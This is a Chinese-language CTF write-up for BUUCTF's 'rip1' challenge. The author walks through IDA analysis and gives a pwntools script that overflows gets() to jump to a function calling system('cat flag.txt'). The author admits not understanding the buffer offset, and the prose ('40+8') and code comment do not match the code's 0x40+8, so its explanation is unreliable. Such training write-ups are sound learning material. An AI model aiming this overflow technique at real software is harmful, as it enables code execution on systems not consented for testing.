【Pwn | CTF】BUUCTF rip1

天命：第二题pwn，这次知道了目标就是瞄准system函数，如果里面是 /bin/sh 之类的就是直接getshell，如果是普通命令的话，应该就是getflag了

IDA64位打开文件

第8行的函数是把一个东西放进S这个字符串数组变量里

sub_40060D这个函数就是重点，点进去一看就是我们的目标system("cat flag.txt")

getflag 的函数

main最后一行就是gets函数，应该就是利用这个有漏洞的函数进行覆盖缓冲区

那就要拿到两个东西：sub_40060D函数的入口地址 和 v5变量的缓冲区大小

条件一：获取sub_40060D函数入口地址

先打开一下地址栏，因为是没有默认打开的

把这两个勾上，才会有地址

用汇编查看代码，就能看到入口地址

条件二：获取v5变量的缓冲区大小

点进去变量，然后这里开始我就不懂了，别人wp就说这里是40空间+8空间（8空间就是覆盖64位下rbp的长度）

最后攻击

一知半懂

from pwn import *

p = remote('node5.buuoj.cn','26425')

# 其实我也没怎么理解
# 这里是字符串a是用二进制，然后乘16进制的0x48
# 加上入口函数的地址
payload = b'a' * (0x40+8) + p64(0x40060D)  

p.sendline(payload)
p.interactive()